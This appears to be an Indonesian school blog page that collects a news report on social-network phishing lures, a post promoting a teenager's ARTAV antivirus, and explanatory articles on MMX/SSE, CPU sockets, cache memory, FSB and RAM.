FOLLOW @kertaskotor_

EDIT ME

ALEXA

Loading

Penipu di Jejaring Sosial Pakai Umpan Baru



VIVAnews - Menurut laporan terakhir Spam Report bulanan yang dirilis Symantec, dalam beberapa bulan belakangan, muncul tren situs penipuan (phising) yang memalsukan merek-merek jejaring sosial.

Dalam upayanya untuk mengelabui pengguna, penipu menggunakan banyak taktik dan umpan baru. Tujuannya agar dapat mengelabui pengguna sehingga mereka memberikan informasi pribadi mereka.

“Salah satu contohnya adalah website phishing dengan nama “Webcam” dan yang menyediakan gambar webcam di halaman phishing-nya,” sebut Symantec dalam laporannya, 31 Januari 2010.

Di sini, situs itu memberi kesan bahwa mereka menyediakan fasilitas webcam untuk pengguna agar dapat berinteraksi satu sama lain di jejaring sosial. Padahal, situs aslinya sebenarnya tidak menyediakan fasilitas itu.

Metode kedua, kata Symantec, penipu memanfaatkan pornografi sebagai umpan untuk mencuri data pribadi pengguna. Caranya, website phishing itu mengklaim bahwa situs jejaring sosial tertentu telah mengeluarkan edisi baru untuk pengguna dewasa.

“Jejaring sosial edisi ‘baru’ tersebut mengesankan bahwa pengguna dapat melihat video dewasa dari skandal-skandal terkenal yang diambil dari kamera tersembunyi,” kata Symantec. “Lebih lanjut, situs phisihing itu mengklaim bahwa pengguna juga bisa berinteraksi dan bergabung dalam chatting khusus dewasa,” sebut Symantec.

Pada metode penipuan ini, situs penipu menyatakan bahwa pengguna bisa mengetahui berita terbaru mengenai skandal-skandal aktris terkenal. Situs juga berisi gambar porno. Tampilan dan nuansa situs dibuat untuk meningkatkan daya tarik pornografi tersebut.

Metode ketiga, umpan yang digunakan adalah penawaran palsu berupa software untuk meng-hack (hacking software). Website penipu yang menggunakan metode ini menyediakan konten yang sudah dimodifikasi sehingga mirip seperti versi alternatif dari sebuah jejaring sosial yang ditujukan untuk hacker profesional.

“Phisher terus menggunakan bentuk-bentuk umpan baru dan berbeda yang semuanya memiliki tujuan yang sama. Membuat pengguna yakin bahwa mereka akan mendapatkan manfaat jika memberikan informasi dan login ke situs yang mereka buat,” sebut Symantec.

Namun demikian, Symantec menyebutkan, tentu saja jika pengguna menjadi korban dari penipuan itu, phisher akan berhasil mencuri informasi rahasia mereka untuk pencurian identitas.

Merasakan ARTAV Internet Security

ARTAV ANTIVIRUS LOKAL BUATAN ANAK NEGERI

Kembali anak negeri membuat Antivirus, dan Antivirus ini diyakini mampu memenuhi kebutuhan para pengguna komputer yang ingin membasmi virus-virus yang sering menggangu ditengah pekerjaan kita. Antivirus yang dibuat oleh anak negeri tersebut diberinama ARTAV Internet Security. Antivirus ini dibuat oleh dua bersaudara Arrival Dwi Sentosa dan kakaknya Taufik Aditya Utama. Mereka adalah anak dari pasangan Herman Suherman (45) dan Yeni Soffia (38).
Virus ini diciptakan oleh Arrival Dwi Sentosa yang masih berusia 13 tahun dan kini duduk dikelas 2 SMP Negeri 48 Bandung. Sedangkan Kakaknya yaitu Taufik Aditya Utama yang masih duduk di kelas 2 SMA Negeri 25 Bandung sebagai desainer tampilan Antivirus ini.

Antivirus dan tentang pembuatnya secara tak sengaja saya temukan beritanya di detikinet.com. Walau sebelumnya di komputer saya sudah ada Antivirus buatan anak negeri juga tapi tak ada salahnya saya mencoba. TKJ-SMK NASIONAL DEPOK
Asal muasal ketertarikan dirinya untuk membuat anti virus karena kekesalan dirinya terhadap komputer di rumahnya sering terkena virus. Dulu dia berkali-kali menginstal ulang untuk membasmi virus yang menginfeksi komputernya.
“Habisnya saya kesal. Komputer di rumah selalu kena virus dan saya harus sering-sering instal ulang. Saya penasaran dengan virus-virus yang menyerang komputer di rumah. Saya cari tahu di internet bagaimana cara kerja virus dan saya beli buku tentang visual basic untuk memahami cara kerja virus,” katanya menjelaskan awal ketertarikannya kepada virus.
Perlu waktu setahun bagi Ival untuk membuat Artav. Awalnya Ival memberikan anti virus buatnya kepada teman-temannya dan keluarganya. Mendapatkan respon yang positif, dirinya lalu memberanikan diri untuk memposting anti virus buatannya di akun facebook miliknya. Begitu diposting di facebook, respon dari masyarakat cukup bagus…sumber berita.
Saya berharap agar anak-anak negeri seperti ini mendapat dukungan dari semua pihak agar mereka bisa menciptakan sesuatu yang bisa digunakan oleh banyak orang dipenjuru dunia.
Saya yakin selama kita “jujur” membantu mereka tanpa embel-embel sesuatu, mereka akan memberi nama harum bangsa ini dan segera mengganti generasi yang sudah saatnya “lengser”.
Ayo Kawan dan sahabat blogger untuk segera mencoba dan menggunakan Antivirus ARTAV ini.
Salam

MMX, SSE, SSE2, SSE3 & SSSE3

Pada awalnya, istilah MMX dikabarkan merupakan kependekan dari MultiMedia eXtension atau Multiple Math atau Matrix Math eXtension. Namun pihak Intel secara resmi menolak pengertian tersebut, dan mengatakan bahwa MMX bukan singkatan apapun juga. MMX adalah trademarked (cap/merk dagang) Intel, yang mengandung pengertian atas peningkatan prosesor dalam kompresi & dekompresi video, manipulasi gambar, enkripsi, pemrosesan Input/Output.

Teknologi MMX dirancang dan dipatenkan oleh Intel Corporation. Diperkenalkan pertama kali pada bulan Januari tahun 1997 yang diterapkan pada prosesor Pentium yang kemudian disebut dengan istilah ‘Pentium with MMX Technology’.

MMX sendiri sebenarnya adalah sekumpulan instruksi SIMD. Dengan penerapan SIMD, memungkinkan chip prosesor mengeksekusi perintah-perintah yang berulang-ulang atau yang paralel secara cepat, terutama ketika prosesor menjalankan perintah yang berhubungan dengan video, audio, grafik, dan animasi. Secara teknis, dijelaskan bahwa ke dalam rancangan teknologi MMX ini, Intel menambahkan delapan register baru ke dalam arsitektur prosesornya. Register tersebut adalah MM0 hingga MM7. Kenyataannya, register baru ini adalah nama lain dari stack register FPU x87 yang sudah ada.

SIMD kependekan dari Single Instruction Multiple Data. Salah satu perusahaan pembuat prosesor yang secara luas telah menerapkan SIMD adalah Intel Corporation. Intel memanfaatkan SIMD ini dalam teknologi MMX, ciptaannya. Teknologi MMX sendiri lebih banyak berperan dalam peningkatan/perbaikan aspek multimedia. Cara kerja SIMD dapat diilustrasikan sebagai berikut:
Misalkan ingin mengubah jelas-tidaknya (gelap-terangnya) suatu gambar yang tampil pada layar monitor, salah satu caranya adalah mengatur/mengubah nilai brightness-nya. Pengubahan nilai brightness, berarti melibatkan pengubahan nilai tiga warna dasar, yaitu merah, hijau, dan biru, karena warna gambar pada layar monitor selalu ditentukan oleh porsi perpaduan ketiga warna ini.
Nilai ketiga warna tersebut akan dibaca dari memori. Nilai-nilai inilah yang akan diubah, ditambah atau dikurangi, sehingga diperoleh nilai baru yang kemudian ditulis balik ke memori. Karena gambar ini disusun dari pixel, tentu datanya akan berjumlah banyak berbentuk matriks atau vektor.
Prosesor SIMD akan menganggap data tadi satu blok. Prosesor SIMD akan memanggil sejumlah data (satu blok data tadi) hanya dalam sekali instruksi. Cara semacam ini dapat mengurangi waktu pemanggilan, dan lebih efisien dibandingkan harus memanggil satu per satu dengan instruksi berkali-kali secara berseri (individual) dari data yang ada, seperti ditunjukkan oleh desain prosesor tradisional. Perhatikan pula dua contoh berikut:
o Cara pertama: Pemanggilan/instruksi berkali-kali secara seri, misalnya “Ambillah data pixel ini, kemudian data pixel itu, kemudian data pixel berikutnya”
o Cara kedua: Dengan menggunakan prosesor SIMD, pemanggilan ini akan dilakukan dengan instruksi tunggal, yaitu “Ambillah kumpulan pixel-pixel itu”. Kata kumpulan ini menyatakan variasi dari sekumpulan data ke sekumpulan data lagi.
Cara yang kedua dapat mengurangi waktu pemanggilan (hemat waktu) dibandingkan cara pertama.
Set-set instruksi umumnya terdiri satu set penuh dari instruksi-instruksi vektor, seperti perkalian, invers, dan lainnya. Hal ini sangat berguna, khususnya untuk pemrosesan grafik tiga dimensi.
Secara bersamaan, pada saat itu, pesaing Intel yaitu AMD, juga sedang mengembangkan teknologi yang sejenis. Teknologi tersebut diberi nama ‘3Dnow!’. Intel-pun segera mengikuti perkembangan ini. Kurang lebih dua tahun kemudian, Intel menghasilkan teknologi baru yang disebutnya SSE, yang merupakan hasil pengembangan dan penyempurnaan dari teknologi MMX. SSE merupakan set pengembangan yang lebih besar dari instruksi SIMD, dengan dukungan floating point 32 bit dan penambahan set register-register vektor 128 bit, yang memudahkan operasi SIMD dan FPU dalam waktu yang bersamaan.
SSE dikembangkan lagi menjadi SSE2, yang juga mengembangkan instruksi-instruksi MMX sehingga dapat beroperasi pada register XMM 128 bit. SSE dan SSE2 merupakan teknologi eksklusif yang hanya terdapat pada prosesor Intel. Teknologi SSE diterapkan pertama kali pada prosesor Intel Pentium III yang benama sandi Katmai, sehingga sering juga disebut dengan nama Katmai New Instructions (KNI). Keuntungan teknologi ini antara lain:
o Pencapaian resolusi yang lebih tinggi dan kualitas tampilan gambar yang lebih bagus pada software-software grafis.
o Kualitas yang lebih tinggi untuk aplikasi multimedia, seperti encoding dan decoding audio dan video MPEG2.
o Mengurangi beban kerja CPU untuk keperluan speech recognition.
o Meningkatkan akurasi serta respon yang lebih cepat ketika menjalankan aplikasi speech recognition
SSE2 pertama kali diterapkan pada prosesor Pentium 4 yang diperkenalkan pada tahun 2001. Jika pada SSE memiliki 70 instruksi, maka pada SSE2 memiliki tambahan 144 instruksi baru.
Intel terus mengembangkan teknologinya, hingga pada tahun 2004, berhasil menciptakan teknologi SSE3 yang merupakan perkembangan dari SSE2. SSE3 memiliki 13 tambahan instruksi baru, atau dengan kata lain SSE3 memiliki 13 instruksi lebih banyak daripada SSE2. Teknologi SSE3 ini diberi nama sandi Prescott New Instruction (PNI), pertama kali diterapkan dan diperkenalkan pada revisi prosesor Prescott (golongan Pentium 4).
Dan sekarang, SSE3 telah dikembangkan menjadi SSSE3, dan diberi nama sandi Tejas New Instruction (TNI) atau Merom New Instruction (MNI). Teknologi SSSE3 tersebut sudah diterapkan pada prosesor yang menggunakan mikroarsitektur Intel Core, misalnya pada prosesor Intel Xeon 5100 series yang merupakan prosesor kelas server, dan prosesor Intel Core 2 untuk kelas desktop dan mobile. SSSE3 memiliki tambahan 16 instruksi baru yang bersifat diskrit.
Di sisi lain, AMD juga mengembangkan kemampuannya, dan memperkenalkan teknologi Enhanced 3Dnow!, kemudian 3Dnow! Profesional untuk menandingi seri teknologi SSE yang dikeluarkan oleh Intel.
SSE kependekan dari Streaming SIMD Extension
SSE2 kependekan dari Streaming SIMD Extension 2
SSE3 kependekan dari Streaming SIMD Extension 3
SSSE3 kependekan dari Supplemental Streaming SIMD Extension 3

Pengertian Socket

Soket adalah tempat dudukan prosesor pada motherboard. Dudukan ini berbentuk segi empat dengan lubang-lubang kecil tempat tertancapnya kaki-kaki (pin-pin) prosesor yang tersusun membentuk matriks 2 dimensi. Susunan, letak, dan jarak antar lubang sama persis dengan susunan, letak, dan jarak antar pin-pin pada prosesor.

Istilah soket (nama lengkapnya adalah soket CPU atau soket prosesor) telah digunakan secara luas dalam dunia komputer untuk menggambarkan konektor yang menghubungkan motherboard dengan prosesor, khususnya untuk tipe komputer desktop dan server. Prosesor yang dimaksud di sini terutama prosesor berarsitektur Intel x86.

Banyak sekali ditemukan soket-soket pada motherboard yang diproduksi menggunakan arsitektur PGA (Pin Grid Array). Seperti telah disinggung di atas, pada soket tersebut banyak lubang-lubang tempat tertancapnya (diselipkannya) pin-pin atau kaki-kaki prosesor yang terletak di sisi bawah permukaan prosesor. Contoh soket yang menggunakan arsitektur ini adalah soket 370 (untuk dudukan prosesor Intel Pentium 3), socket 423 dan socket 478 (untuk dudukan prosesor Intel Pentium 4).

Socket 370 berarti dudukan prosesor tersebut memiliki 370 lubang. Dengan sendirinya socket tersebut untuk dudukan prosesor yang jumlah kaki atau pin-pin-nya sebanyak 370 pin. Prosesor jenis ini biasanya prosesor Intel Pentium 3. Begitu juga pengertian untuk socket 423 dan socket 478.

Selain tipe PGA terdapat pula tipe lainnya, misalnya LGA (Land Grid Array). Pada tipe LGA, pin-pinnya tidak terdapat pada prosesor, tetapi terdapat pada soket. Jika pada arsitektur PGA, pin-pinnya terletak pada prosesor, maka pada LGA, pin-pinnya ada pada soket. Pin-pin ini yang kontak langsung dengan sisi bawah/dasar prosesor tipe LGA.

Dudukan prosesor pada motherboard tidak selalu berbentuk soket, ada pula yang berbentuk slot, atau dapat dikatakan dudukan berbasis slot (memang bentuknya lebih mirip slot ekspansi dari pada soket). Prosesornya sendiri dikemas menggunakan dudukan berbentuk slot yang disebut single edge connection. Dudukan berarsitektur slot ini, banyak digunakan pada prosesor Pentium 2 dan Pentium 3.
Selain jenis socket-socket tersebut, masih ada lagi jenis socket yang lain, yaitu socket A (untuk prosesor AMD dengan jumlah pin 462), Socket AM2 (untuk prosesor AMD dengan jumlah pin 940), dan masih banyak lagi yang tak akan disebutkan di sini, karena pada dasarnya pengertiannya adalah sama (analogis).
Daftar berbagai jenis soket dan slot prosesor yang digunakan pada prosesor buatan Intel disajikan Pada tabel
Daftar soket dan slot prosesor yang digunakan pada prosesor Intel
Jenis soket
Prosesor yang kompatibel
Soket 1
80486
Soket 2
80486
Soket 3
80486 (3,3 V dan 5 V)
Soket 4
Intel Pentium 60 MHz, Pentium 66 MHz
Soket 5
Intel Pentium 75 hingga 133 MHz
Soket 7
Intel Pentium, Pentium MMX
Soket 8
Intel Pentium Pro
Soket 370
Intel Pentium III, Celeron
Soket 423
Intel Pentium 4 core Willamate
Soket 478
Intel Pentium 4, Intel Pentium 4 HT, Pentium 4 Extreme Edition, Celeron, Celeron D, Pentium M
Soket 479
Mobile: Intel Pentium M, Celeron M
Soket 486
80486
Soket 495
Mobile: Intel Celeron
Soket 603
Intel Xeon.
Soket 604
Intel Xeon.
Soket 615
Mobile: Intel Celeron
Soket M
Mobile: Intel Core Solo, Core Duo, Core 2 Duo, Celeron M
Soket N
Intel Dual-Core Xeon LV
Jenis soket
Prosesor yang kompatibel
Soket P
Mobile: Intel Core 2 Duo, Core 2 Extreme, Celeron M
LGA 771
Intel Xeon.
LGA 775
Intel Pentium 4, Pentium D, Celeron D, Pentium Extreme Edition, Core 2 Duo, Core 2 Extreme, Core 2 Quad, Xeon 3000 series
PAC418
Intel Itanium
PAC611
Intel Itanium
Slot 1
Intel Celeron, Intel Pentium II, Intel Pentium III
Slot 2
Intel Pentium II Xeon, Intel Pentium II Xeon
Keterangan:
Soket LGA771 dikenal juga dengan nama Soket 771 atau Soket J
Soket LGA775 dikenal juga dengan nama Soket 775 atau Soket T

Soket 4

Soket 4 adalah dudukan prosesor desktop Pentium Classic yang bernama sandi P5. Soket ini memiliki lubang pin sebanyak 273 pin PGA (Pin Grid Array). Pentium Classic (P5) diproduksi dengan teknik fabrikasi 800 nm. Contoh prosesor Pentium Classic yang menggunakan dudukan soket 4 adalah Pentium 60 MHz dan Pentium 66 MHz. Pentium Classic P5 diperkenalkan pertama kali pada tanggal 22 Maret 1993.



Soket 5

Soket 5 biasanya digunakan untuk dudukan prosesor Pentium Classic 75 MHz hingga 133 MHz. Prosesor tersebut juga dapat (kompatibel) ditempatkan/dipasangkan ke Soket 7.


soket




Soket 7

Soket 7 adalah dudukan prosesor desktop Pentium Classic yang bernama sandi P54 dan P54C. Soket ini memiliki lubang pin sebanyak 296 atau 321 pin PGA (Pin Grid Array). Pentium Classic (P54) diproduksi dengan teknik fabrikasi 600 nm, sedangkan Pentium Classic (P54C) diproduksi dengan teknik fabrikasi 350 nm. Contoh prosesor Pentium Classic yang menggunakan dudukan soket 7 adalah Pentium 75 MHz, Pentium 90 MHz dan Pentium 100 MHz hingga Pentium 200 MHz. Pentium Classic P54 diperkenalkan pertama kali pada tanggal 7 Maret 1994, sedangkan Pentium Classic P54C diperkenalkan pertama kali setahun kemudian, yaitu pada bulan Maret 1995.

Soket 7 juga digunakan untuk dudukan prosesor desktop Pentium MMX bernama sandi P55C. Prosesor ini diproduksi dengan teknik fabrikasi 350 nm. Contoh prosesor Pentium MMX yang menggunakan dudukan soket 7 adalah Pentium MMX 166 MHz, Pentium MMX 200 MHz dan Pentium MMX 233 MHz. Pentium MMX P55C diperkenalkan pertama kali pada tanggal 8 Januari 1997.

Soket 7 diproduksi untuk menggantikan pendahulunya, yaitu soket 5. Soket 7 ini juga dapat digunakan untuk dudukan prosesor-prosesor yang berbasis soket 5. Dengan kalimat lain, dapat dikatakan “Prosesor-prosesor berbasis soket 5 dapat dipasangkan pada soket 7”.
Dibandingkan dengan soket 5, maka soket 7 ini memiliki pin-pin ekstra dan dilengkapi desain dua jalur voltase yang terpisah untuk prosesor. Namun, tidak semua produsen motherboard memanfaatkan peluang desain ini. Motherboard-motherboard tertentu masih menggunakan desain voltase tunggal walaupun menggunakan soket 7. Patut dipahami bahwa soket 5 memiliki voltase tunggal.
Sebenarnya, soket 7 merupakan salah satu jenis soket yang digunakan secara luas oleh berbagai produsen prosesor. Selain kompatibel dengan prosesor produk Intel, soket ini juga kompatibel dengan prosesor AMD maupun Cyrix. Prosesor-prosesor AMD dan Cyrix yang kompatibel dengan soket 7 antara lain AMD K5 hingga K6, Cyrix 6×86 (dan MX) P120 - P233.

Soket 7 bekerja dengan baik pada kisaran voltase 2,5 volt hingga 3,5 volt dengan FSB 66 MHz hingga 83 MHz.

Soket 8

Soket 8 adalah dudukan prosesor desktop Pentium Pro. Soket ini memiliki lubang pin sebanyak 387 pin. Pentium Pro ada yang diproduksi dengan teknik fabrikasi 600 nm, ada pula yang diproduksi dengan teknik fabrikasi 350 nm. Contoh prosesor Pentium Pro yang menggunakan dudukan soket 8 adalah Pentium Pro 150 MHz, Pentium Pro 166 MHz dan Pentium Pro 180 MHz dan Pentium Pro 200 MHz.

Soket 370

Seperti telah disinggung sebelumnya bahwa soket 370 memiliki lubang pin sebanyak 370 buah. Soket 370 diproduksi untuk menggantikan dudukan prosesor yang lama, yaitu slot 1. Soket ini pertama kali digunakan oleh sebagian varian prosesor desktop Celeron bernama sandi Mendocino. Dudukan prosesor Celeron Mendocino ini sering disebut secara lengkap dengan istilah Socket 370 PPGA (Plastic Pin Grid Array) Package.

Pada perkembangan berikutnya, soket 370 juga digunakan oleh sebagian varian prosesor desktop Pentium 3 bernama sandi Coppermine dan Tualatin. Dudukan pada kedua jenis prosesor ini, sering disebut dengan nama lengkap socket 370 pin FC-PGA (Flip-Chip Pin Grid Array) Package. Soket 370, selain digunakan untuk prosesor Intel, dapat juga digunakan untuk prosesor Via-Cyrix Cyrix III yang kemudian diubah namanya menjadi VIA C3.

Soket 370 banyak ditemukan pada motherboard mini-ITX. Bahkan tak jarang ditemukan tipe-tipe motherboard untuk Pentium III yang memasang dua macam dudukan prosesor sekaligus (dual) dalam satu motherboard, yaitu soket 370 dan slot 1. Namun, kedua dudukan ini tidak bisa digunakan bersamaan pada satu waktu yang sama. Jika salah satu digunakan, maka yang lainnya tidak berfungsi.

Harus dicermati bahwa pendingin prosesor (CPU cooler) yang digunakan untuk prosesor bersoket 370 ini, bobotnya tidak boleh melebihi 180 gram. Bila bobot CPU cooler tersebut melebihi 180 gram, dapat mengakibatkan kerusakan.
Soket 370 ini kemudian ditinggalkan oleh pihak Intel, sebagai penggantinya digunakan soket 423, 478 dan 775 yang digunakan untuk Pentium 4, yang selanjutnya soket 775 digunakan untuk prosesor Intel Core 2.

Soket 370 bekerja pada kisaran voltase 1,05 volt hingga 2,1 volt dengan FSB 66 MHz, 100 MHz dan 133 MHz.

Perlu diketahui bahwa soket 370 tersebut tidak bersifat universal, artinya soket 370 pada motherboard tidak selalu cocok dengan seluruh prosesor yang kebetulan jumlah pin-nya 370. Misalnya, motherboard yang memiliki soket 370 yang ditujukan untuk prosesor Celeron, belum tentu kompatibel bila dipasangkan dengan prosesor Pentium 3 Copermine maupun Tualatin, atau sebaliknya, walaupun sama-sama pengguna soket 370.

Terdapat 3 varian soket 370 pada motherboard yang masing-masing berbeda spesifikasi pinout-nya. Ketiga varian soket 370 tersebut adalah:

o Soket 370 generasi pertama: soket ini hanya sesuai (kompatibel) dengan prosesor Celeron (jenis soket PPGA).

o Soket 370 generasi kedua: soket ini hanya sesuai dengan prosesor Pentium 3 Coppermine (jenis soket FCPGA). Soket generasi pertama dan kedua ini tidak saling kompatibel satu dengan lainnya.

Soket generasi ketiga: soket ini mendukung prosesor Pentium 3 Coppermine (FCPGA) dan prosesor Pentium 3 Tualatin (FCPGA2).
Sebagai tambahan informasi, berikut ini disajikan berbagai jenis chipset yang kompatibel (support) dengan prosesor-prosesor bersoket 370.
Chipset yang kompatibel dengan prosesor-prosesor bersoket 370.
Produsen
Chipset
INTEL
· i440/450 chipset series: i440BX/EX/FX/GX/LX/MX/MX-100/ZX,
i450GX/KX/NX
· i8XX chipset series : i810/E/E2/L, i815/E/EG/EP/G/P, i820E, i840
VIA
· Appollo/ Appollo Pro/ Appollo Pro+
· PRO133/PRO133A/PRO133T/PM133/PN133/PN133T/PL133/
PL133T/PLE133/PLE133T
· Pro266/PM266/Pro266T/PM266T
· CLE266/CN400
ALi
Aladdin Pro/ProII/TNT2/Pro 4/Pro 5/Pro 5T
ATi
S1-370-TL
OPTi
Discovery
SiS
· SiS5600
· SiS 620, SiS 630/E/ET/S/ST,SiS 633/T, SiS 635/T
ULi
M1644T

Cache memory

Pengertian Cache memory
Cache memory adalah memory berukuran kecil berkecepatan tinggi yang berfungsi untuk menyimpan sementara instruksi dan/atau data (informasi) yang diperlukan oleh prosesor. Boleh dikatakan bahwa cache memory ini adalah memory internal prosesor. Cache memory ini berbasis SRAM yang secara fisik berukuran kecil dan kapasitas tampung datanya juga kecil atau sedikit. Pada saat ini, cache memory ada 3 jenis, yaitu L1 cache, L2 cache, dan L3 cache. TKJ-SMK NASIONAL DEPOK
Letak cache memory

L1 cache terintegrasi dengan chip prosesor, artinya letak L1 cache sudah menyatu dengan chip prosesor (berada di dalam keping prosesor). Sedangkan letak L2 cache, ada yang menyatu dengan chip prosesor, ada pula yang terletak di luar chip prosesor, yaitu di motherboard dekat dengan posisi dudukan prosesor. Pada era prosesor intel 80486 atau sebelumnya, letak L2 cache kebanyakan berada di luar chip prosesor. Chip cache terpisah dari prosesor, berdiri mandiri dekat chip prosesor. Sejak era prosesor Intel Pentium, letak L2 cache ini sudah terintegrasi dengan chip prosesor (menyatu dengan keping prosesor). Posisi L2 cache selalu terletak antara L1 cache dengan memori utama (RAM). Sedangkan L3 cache belum diimplementasikan secara umum pada semua jenis prosesor. Hanya prosesor-prosesor tertentu yang memiliki L3 cache.

Cache memory yang letaknya terpisah dengan prosesor disebut cache memory non integrated atau diskrit (diskrit artinya putus atau terpisah). Cache memory yang letaknya menyatu dengan prosesor disebut cache memory integrated, on-chip, atau on-die (integrated artinya bersatu/menyatu/ tergabung, on-chip artinya ada pada chip).

L1 cache (Level 1 cache) disebut pula dengan istilah primary cache, first cache, atau level one cache. L2 cache disebut dengan istilah secondary cache, second level cache, atau level two cache.


cache
Kecepatan cache memory
Transfer data dari L1 cache ke prosesor terjadi paling cepat dibandingkan L2 cache maupun L3 cache (bila ada). Kecepatannya mendekati kecepatan register. L1 cache ini dikunci pada kecepatan yang sama pada prosesor. Secara fisik L1 cache tidak bisa dilihat dengan mata telanjang. L1 cache adalah lokasi pertama yang diakses oleh prosesor ketika mencari pasokan data. Kapasitas simpan datanya paling kecil, antara puluhan hingga ribuan byte tergantung jenis prosesor. Pada beberapa jenis prosesor pentium kapasitasnya 16 KB yang terbagi menjadi dua bagian, yaitu 8 KB untuk menyimpan instruksi, dan 8 KB untuk menyimpan data.
Transfer data tercepat kedua setelah L1 cache adalah L2 cache. Prosesor dapat mengambil data dari cache L2 yang terintegrasi (on-chip) lebih cepat dari pada cache L2 yang tidak terintegrasi. Kapasitas simpan datanya lebih besar dibandingkan L1 cache, antara ratusan ribu byte hingga jutaan byte, ada yang 128 KB, 256 KB, 512 KB, 1 MB, 2 MB, bahkan 8 MB, tergantung jenis prosesornya. Kapasitas simpan data untuk L3 cache lebih besar lagi, bisa ratusan juta byte (ratusan mega byte).
Prioritas penyimpanan dan pengambilan data
Dalam mekanisme kerjanya, data yang akan diproses oleh prosesor, pertama kali dicari di L1 cache, bila tidak ada maka akan diambil dari L2 cache, kemudian dicari di L3 cache (bila ada). Jika tetap tidak ada, maka akan dicari di memori utama. Pengambilan data di L2 cache hanya dilakukan bila di L1 cahe tidak ada.
Lebih jelasnya proses baca tulis data yang dilakukan oleh prosesor ke memori utama dapat dijelaskan sebagai berikut:
Ketika data dibaca/ditulis di memori utama (RAM) oleh prosesor, salinan data beserta address-nya (yang diambil/ditulis di memori utama) disimpan juga di cache. Sewaktu prosesor memerlukan kembali data tersebut, prosesor akan mencari ke cache, tidak perlu lagi mencari di memori utama.
Jika isi cache penuh, data yang paling lama akan dibuang dan digantikan oleh data yang baru diproses oleh prosesor. Proses ini dapat menghemat waktu dalam proses mengakses data yang sama, dibandingkan jika prosesor berulang-ulang harus mencari data ke memori utama.
Secara logika, kapasitas cache memory yang lebih besar dapat membantu memperbaiki kinerja prosesor, setidak-tidaknya mempersingkat waktu yang diperlukan dalam proses mengakses data.

Pengertian FSB

FSB (Front Side Bus) yang sering juga disebut sebagai system bus adalah jalur (bus) yang secara fisik menghubungkan prosesor dengan chipset northbridge pada motherboard. Jalur ini sebagai tempat lintasan data/informasi yang diwujudkan dalam bentuk sinyal-sinyal elektronis. Jalur ini merupakan jalur dua arah, artinya aliran data/informasi bisa berjalan dari prosesor menuju motherboard atau sebaliknya. FSB juga menghubungkan processor dengan memori utama. TKJ-SMK NASIONAL DEPOK

Bandwidth maksimum FSB ditentukan lebar FSB (wide FSB), frekuensi FSB, dan jumlah transfer per detik (transfer/tick). Misalkan lebar FSB 32 bit (setara 4 byte) dengan frekuensi 200 MHz dan 4 transfer per detik. Bandwith maksimumnya adalah:

Lebar FSB x frekuensi FSB x jumlah transfer per detik

= 4 x 200 x 4

= 3200 Mega Byte perdetik

Maknanya adalah jumlah data maksimum yang bisa dialirkan oleh FSB adalah 3200 MB per detik. Makin besar bandwidth FSB makin cepat komputer bekerja. Namun, hal ini juga bergantung pada kemampuan komponen-komponen lain dalam mendukung kerja komputer (prosesor), misalnya cache memory, memori utama, teknologi-teknologi lain yang terkandung dalam prosesor itu sendiri.
Bandwidth adalah jumlah data maksimum yang dapat dipindahkan dalam satuan waktu tertentu. Biasanya diukur dengan satuan byte per detik, bit per detik atau tingkatan satuan yang lebih besar, misalnya mega byte per detik, giga bit per detik. Satuan ini tergantung besar data atau sesuai keperluan pemakai/ penghitungnya.


Kemampuan transfer per detik yang dimiliki FSB tergantung teknologi yang digunakan pada prosesor tersebut. Misalnya teknologi GTL+ mampu melakukan 2 transfer per detik, EV6 melakukan 4 transfer per detik, sedangkan teknologi AGTL+ mampu mencapai 8 transfer per detik.
FSB merupakan ‘tulang punggung’ hubungan antara prosesor dengan chipset pada motherboard, karena melalui FSB inilah keduanya saling mengirim dan menerima data/informasi. Melalui system bus chipset berhubungan ke komponen lain yang terhubung pada motherboard. FSB digunakan untuk mengomunikasikan antara motherboard dengan komponen lainnya.
Patut dicatat bahwa semua sistem bus (PCI, AGP, memory) pada motherboard terhubung ke chipset, sehingga dapat dikatakan bahwa chipset menjadi titik sentral koneksi sistem bus pada motherboard. Dengan demikian tidaklah salah bila disebutkan bahwa FSB menghubungkan prosesor dengan komponen (device) lain dalam satu sistem komputer melalui chipset yang ada pada motherboard.
FSB merupakan jalur penghubung antara prosesor dengan memori utama, juga penghubung antara prosesor dengan chipset (northbridge) pada motherboard.
Kecepatan bus AGP, PCI, ISA, dan memori, berbeda-beda seperti diilustrasikan pada gambar 2.
letak bus

RAM dan MEMORI lainnya

RAM adalah kependekan dari Random Access Memory (Memori Akses Acak). RAM merupakan salah satu tipe memori yang biasanya khas digunakan dalam sebuah komputer yang fungsinya untuk menyimpan data yang sifatnya sementara, yaitu ketika komputer sedang aktif (sedang dialiri daya, atau ‘sedang hidup’). Istilah RAM, merujuk pada perangkat keras berupa memori fisik sebagai media penyimpan data yang bersifat sementara pada komputer. Sebelum membahas RAM, untuk lebih jelasnya, berikut ini dibahas lebih dahulu makna istilah memori secara umum dalam pengetahuan komputer.

Pengertian istilah memory

Dalam pengetahuan komputer, penggunaan istilah memori biasanya merujuk pada media atau tempat untuk menyimpan data. Dapat dikatakan bahwa memori adalah perangkat keras yang khas digunakan untuk menyimpan data atau informasi dan dapat dibaca atau diambil kembali saat diperlukan.TKJ-SMK NASIONAL DEPOK
Pada komputer, program (software) yang sedang dijalankan (di-run) dan data yang sedang diproses, disimpan di dalam memori selama program tadi masih aktif bekerja. Memori itu sendiri sebenarnya terdiri dari ‘kotak-kotak’ untuk menyimpan data (karakter). Masing-masing kotak tersebut memiliki alamat atau adres (address) sendiri. Dengan menggunakan adres inilah CPU dapat membaca atau menulis data pada memori. Kecepatan pergerakan data keluar masuk memori biasanya sepadan dengan kecepatan kerja CPU itu sendiri. CPU dan memori merupakan bagian yang tak terpisahkan dari sebuah komputer. Secara fisik (hardware), kebanyakan memori berupa chip semikonduktor.
Sampai sekarang, terdapat banyak jenis memori yang masing-masing mempunyai sifat atau karakteristik yang khas, walaupun suluruhnya tetap memiliki fungsi pokok, yaitu menyimpan data. Jenis-jenis memori tersebut antara lain:

* RAM (Random Access Memory), yang terdiri dari:

1.SRAM atau Static RAM (Static Random Access Memory), contohnya digunakan untuk Cache Memory
2.NV-RAM atau Non-Volatile RAM (Non-Volatile Random Access Memory)
3.Memori fisik DRAM atau Dynamic RAM (Dynamic Random Access Memory), yang terdiri dari:
- Fast Page Mode DRAM (Fast Page Mode Dynamic Random Access Memory)
- EDO RAM atau Extended Data Out DRAM (Extended Data Out Dynamic Random Access Memory)
- XDR DRAM
- SDRAM atau Synchronous DRAM (Synchronous Dynamic Random Access Memory), yang meliputi:
a. DDR SDRAM atau Double Data Rate Synchronous DRAM (Double Data Rate Synchronous
Dynamic Random Access Memory).
